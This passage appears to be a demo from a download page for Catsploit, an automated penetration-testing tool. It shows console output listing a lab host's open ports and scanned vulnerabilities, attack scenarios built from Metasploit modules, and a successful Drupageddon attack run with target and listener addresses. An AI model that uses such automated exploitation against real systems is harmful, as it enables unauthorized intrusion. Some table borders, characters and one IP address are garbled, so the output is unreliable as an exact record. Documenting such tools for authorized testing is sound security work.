│ h_exbiy6 │ 192.168.0.10   │          │ Linux 3.10 - 4.11                │ False │
│ h_nhqyfq │ 192.168.0.20   │          │ Microsoft Windows 7 SP1          │ False │
└──────────┴ ───────────────┴──────────┴──────────────────────────────────┴───────┘


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform     ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu   │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴─ ─────┘

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4         ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │          │      │            │
└──────────── ─┴──────────┴──────┴────────────┘

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ service     ┃ product      ┃ version                       ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 21   │ ftp         │ ProFTPD      │ 1.3.5                      │
│ 192.168.0.10 │ tcp   │ 22   │ ssh         │ OpenSSH      │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp   │ 80   │ http        │ Apache httpd │ 2.4.7                      │
│ 192.168.0.10 │ tcp   │ 445  │ netbios-ssn │ Samba smbd   │ 3.X - 4.X                  │
│ 192.168.0.10 │ tcp   │ 631  │ ipp         │ CUPS         │ 1.7                        │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ vuln_name                                                           ┃ cve            ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 0    │ TCP Timestamps Information Disclosure                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 21   │ FTP Unencrypted Cleartext Login                                     │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak MAC Algorithm(s) Supported (SSH)                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Encryption Algorithm(s) Supported (SSH)                        │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Host Key Algorithm(s) (SSH)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Test HTTP dangerous methods                                            │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    │ CVE-2014-3704  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Sensitive File Disclosure (HTTP)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Unprotected Web App / Device Installers (HTTP)                      │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Cleartext Transmission of Sensitive Information via HTTP            │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.9.0 XSS Vulnerability                                    │ CVE-2012-6708  │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.6.3 XSS Vulnerability                                    │ CVE-2011-4969  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal 7.0 Information Disclosure Vulnerability - Active Check      │ CVE-2011-3730  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-2183  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-6329  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2011-3389  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2015-0204  │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───&   #9472;────────────┘

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd   ┃ steps ┃ first attack step             ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947   3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 32.0  │ 1     │ exploit/multi/http/jenkins_s… │
│ 5gnsvh      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ 6nlxyc      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 48.32 │ 2     │ exploit/multi/http/jenkins_s… │
│ 8jos4z      │ 0.0.0.0     │ 192.168.0.1   0   │ 0.7   │ 72.8  │ 2     │ exploit/multi/http/jenkins_s… │
│ 8kmmts      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 32.0  │ 1     │ exploit/multi/elasticsearch/… │
│ agjmma      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/windows/http/managee… │
│ joglhf      │ 0.0.0.0     │ 192.168.0.10   │ 70.0  │ 60.0  │ 1     │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof      │ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0  │ 1     │ exploit/multi/http/drupal_dr… │
│ xuowzk      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/multi/http/struts_dm… │
│ yttv51      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76    │ 2     │ exploit/multi/http/jenkins_s… │
│ znv76x      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd  ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0 │
└─────────────┴──────── ───────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step                                  ┃ params                ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10  │
│   │                                       │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.

Download Catsploit

Read More